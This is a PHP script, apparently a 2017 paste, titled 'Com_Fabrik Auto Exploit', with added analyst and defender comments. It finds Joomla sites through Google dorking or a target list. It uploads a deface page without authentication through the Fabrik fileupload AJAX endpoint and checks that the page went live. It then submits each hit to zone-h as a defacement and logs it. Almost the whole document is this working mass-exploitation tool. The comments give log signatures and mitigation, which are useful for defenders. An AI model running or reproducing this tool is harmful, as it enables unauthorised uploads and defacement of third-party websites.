zaksya

Bot Com Fabrik Auto Dorking Dan Exploit

Dec 14th, 2017
  <?php
  // Turns off all PHP error reporting for the rest of the run, so failures
  // in the requests below produce no diagnostics.
  error_reporting(0);
  /*
      Com_Fabrik Auto Exploit
      Re Code By ZakirDotID
      Thanks To : IndoXploit

      Analyst note: the script below posts a file to the Joomla Fabrik
      component's "fileupload" plugin AJAX endpoint (see exploit()).
      Web-server logs can be searched for POST requests whose query string
      contains option=com_fabrik together with plugin=fileupload and
      method=ajax_upload.
  */
  /**
   * Command-line helper that POSTs a local file to the Joomla Fabrik
   * "fileupload" plugin AJAX endpoint of a target site, then submits the
   * result to the zone-h.com notification form and appends it to a local
   * log file.
   *
   * Defender notes (all taken from the code in this class):
   *  - The upload is a multipart POST to
   *    /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
   *    with a form field named "file"; the request carries no cookie or
   *    credential. This query string is a usable log / WAF signature.
   *  - The upload is sent by the curl binary with no user-agent option, so it
   *    presumably shows curl's default agent; the follow-up fetch made through
   *    cUrl() sends the user agent "LinuxG3k/10.1".
   *  - Mitigation is on the site side: run a fixed release of the Fabrik
   *    extension (version not stated on this page), deny or authenticate
   *    access to the endpoint above, and review upload directories for
   *    unexpected files.
   *  - On the operator's machine the tool leaves "hasil-exploit.txt" and
   *    "cookie.txt" in the working directory.
   */
  class excom
  {
  // Base URL of the site currently being processed.
  public $url;
  public $file="sad.htm"; // Local file that is uploaded; expected in the working directory (operator-configurable)
  public $hacker = "ZakirDotID";   // Nickname sent as the "defacer" field to zone-h (operator-configurable)
  public $dorking=0; // Set to 1 to enable the search-engine ("auto dorking") mode
  // Scratch slot reused for HTTP responses, shell output and file handles.
  public $var;
  // Current cURL handle, set inside cUrl().
  public $ch;
  /**
   * Ensures a URL string has a scheme.
   *
   * If $url begins with neither "http://" nor "https://", "http://" is
   * prepended, the result is stored in $this->url and returned. Otherwise
   * $url is returned as given.
   *
   * @param string $url Host name or URL.
   * @return string URL with a scheme.
   */
  public function valid($url){
  if(!preg_match("/^http:\/\//", $url) and !preg_match("/^https:\/\//", $url)){
      return $this->url="http://".$url;
  }else{
      return $url;
  }
  }
  /**
   * Submits $url to the zone-h.com single-notification form and prints a
   * one-line status.
   *
   * The POST body carries $this->hacker as "defacer" and $url as "domain1".
   * The response is searched for a red-font list item; if its text is
   * exactly "ERROR" a "Not Vuln Zone-H" line is printed, otherwise a
   * "Success" line. Nothing is printed when the pattern does not match.
   *
   * @param string $url URL reported to the notification form.
   * @return void
   */
  public function jonh($url){
      // Cookies are disabled for this request (fourth argument false).
      $this->var = $this->cUrl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
      if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $this->var->response, $matches)) {
              if($matches[1] === "ERROR") {
                  // Captures the detailed error text into $matches2; the value is not used afterwards.
                  preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $this->var->response, $matches2);
                  echo "\t[!] $url ==> Not Vuln Zone-H\n";
              } else {
                  echo "\t[+] $url ==> Success\n";
              }
          }
  }
  // Appends $file followed by CRLF to "hasil-exploit.txt" in the working directory.
  public function simpan($file){$this->var=fopen("hasil-exploit.txt", "a+");fwrite($this->var, $file."\r\n");fclose($this->var);}
  /**
   * Sends the upload request for the site in $this->url and reports the outcome.
   *
   * Builds the Fabrik fileupload AJAX URL, runs the curl binary through
   * shell_exec() to POST $this->file as the multipart field "file", and
   * decodes the reply as JSON. A reply containing an "error" key prints a
   * "Failed" line for the host. Otherwise, when a "uri" key is present, the
   * method fetches $this->uri through cUrl(), looks for the word "hacked"
   * (case-insensitive) in the body, and on a match prints a line, calls
   * jonh() and simpan().
   *
   * @return void
   */
  public function exploit(){
      // Endpoint path and parameters are fixed; only the base URL varies per target.
      $this->ur1  = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
      // '@' hides any warning from shell_exec; curl itself runs with --silent and a 5 second connect timeout.
      $this->var = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$this->ur1\"");
      // Decoded as an associative array, then cast to an object for property-style access.
      $this->result = (object) json_decode($this->var,true);
      if(isset($this->result->error)){
      echo "\t[!] ".parse_url($this->url,PHP_URL_HOST). " ==> Failed\n";
      } else {
      if(isset($this->result->uri)){
          // The marker word "hacked" is expected in the fetched page body.
          if(preg_match("/hacked/i", $this->cUrl($this->uri)->response)){
              echo "\t[+] $this->result->uri ==> eXploit\n";
              $this->jonh($this->uri);
              $this->simpan($this->uri);
          }
      }
      }
  }
  /**
   * Performs one HTTP request with the cURL extension.
   *
   * The request uses the user agent "LinuxG3k/10.1", 5 second connect and
   * total timeouts, and has TLS host and peer verification switched off.
   * A non-null $data turns the request into a POST with $data as the body;
   * a non-null $headers is passed as the request header list; $cookie === true
   * reads and writes cookies in "cookie.txt" in the working directory.
   * The raw result and transfer info are also kept in $this->exec and
   * $this->info.
   *
   * @param string      $url     Request URL.
   * @param mixed       $data    POST body, or null for no body.
   * @param array|null  $headers Extra request headers, or null.
   * @param bool        $cookie  Whether to use the cookie file.
   * @return object Object with "response" (curl_exec result) and "info" (curl_getinfo result).
   */
  public function cUrl($url,$data=null,$headers=null,$cookie=true){
          $this->ch = curl_init();
                curl_setopt($this->ch, CURLOPT_RETURNTRANSFER, TRUE);
                curl_setopt($this->ch, CURLOPT_URL, $url);
                curl_setopt($this->ch, CURLOPT_USERAGENT, "LinuxG3k/10.1");
                // Certificate and host-name checks are disabled for every request.
                curl_setopt($this->ch, CURLOPT_SSL_VERIFYHOST, FALSE);
                curl_setopt($this->ch, CURLOPT_SSL_VERIFYPEER, FALSE);
                curl_setopt($this->ch, CURLOPT_CONNECTTIMEOUT, 5);
                curl_setopt($this->ch, CURLOPT_TIMEOUT, 5);
          if($data !== null) {
                curl_setopt($this->ch, CURLOPT_CUSTOMREQUEST, "POST");
                curl_setopt($this->ch, CURLOPT_POST, TRUE);
                curl_setopt($this->ch, CURLOPT_POSTFIELDS, $data);
          }
          if($headers !== null) {
                curl_setopt($this->ch, CURLOPT_HTTPHEADER, $headers);
          }
          if($cookie === true) {
                curl_setopt($this->ch, CURLOPT_COOKIE, TRUE);
                curl_setopt($this->ch, CURLOPT_COOKIEFILE, "cookie.txt");
                curl_setopt($this->ch, CURLOPT_COOKIEJAR, "cookie.txt");
          }
          $this->exec = curl_exec($this->ch);
          $this->info = curl_getinfo($this->ch);
                curl_close($this->ch);
          return (object) [
              "response"  => $this->exec,
              "info"      => $this->info
          ];
      }
      // Opens standard input for reading and returns the stream handle.
      public function _rd(){return fopen("php://stdin", "r");}
      // Prints the tool's banner text to standard output.
      public function _ndas(){
      echo "\n\t============================================================\n";
      echo "\tIndoXploit Tools Recode By ZakirDotID\n";
      echo "\tThanks For : IndoXploit - Garuda Security Hacker\n";
      echo "\tIf Iam Sad , Iam Back !";
      echo "\n\t============================================================\n";
      }
  }
  // Script entry point: print the banner, then run in one of two modes
  // selected by $z->dorking (search mode when 1, target-list mode otherwise).
  $z = new excom();
  $z->_ndas();
  echo "\n\tExploit Com Fabrik With Auto Dorking By ZakirDotID\n";
  if($z->dorking == 1){
  // Search mode: read one search query line from standard input.
  echo "\n\tInput Dork : ";
  $dork = $z->_rd();
  $dork = trim(fgets($dork));
  // Host names already seen during this run.
  $links = array();
  // Requests Google result pages at offsets 0, 10, ... 1000.
  for($i=0;$i<=1000;$i+=10){
  // '@' hides warnings from DOM construction and from loading/parsing the page.
  @$xml = new DOMDocument('1.0', "UTF-8");
  @$xml->loadHTMLFile("http://www.google.com/search?q=".urlencode($dork)."&start=$i");
      // The text of each <cite> element is treated as a result URL; only its host part is kept.
      foreach($xml->getElementsByTagName('cite') as $link) {
          $su =  "http://$link->nodeValue";
          $ahh = parse_url($su, PHP_URL_HOST);
          // Hosts already in $links, or containing "blogspot", are skipped with a "Not Vuln" line.
          if(in_array($ahh, $links) or preg_match("/blogspot/",$ahh)) {
               echo "$ahh Not Vuln\n";
  } else{
      // New host: record it, then iterate over every host in $links and call exploit() for each.
      $links[] = $ahh;
      foreach ($links as $asu) {
          $z->url = $z->valid($asu);
          echo $z->exploit();

      }
  }
  }
  }
  } else {
  // Target-list mode: read a file name from standard input and load that file.
  echo "\n\tInput List Target :";
  $kk = $z->_rd();
  $kk = trim(fgets($kk));
  // Exits with a message when the file cannot be read (or is empty).
  $file = file_get_contents($kk) or exit("\n\tFile Not FOund\n");
  // Entries are split on CRLF line endings.
  $zlz = explode("\r\n", $file);
  // Pass each entry through valid(), then call exploit().
  foreach ($zlz as $loo) {
      $url = $z->valid($loo);
      echo $z->exploit();
  }
  }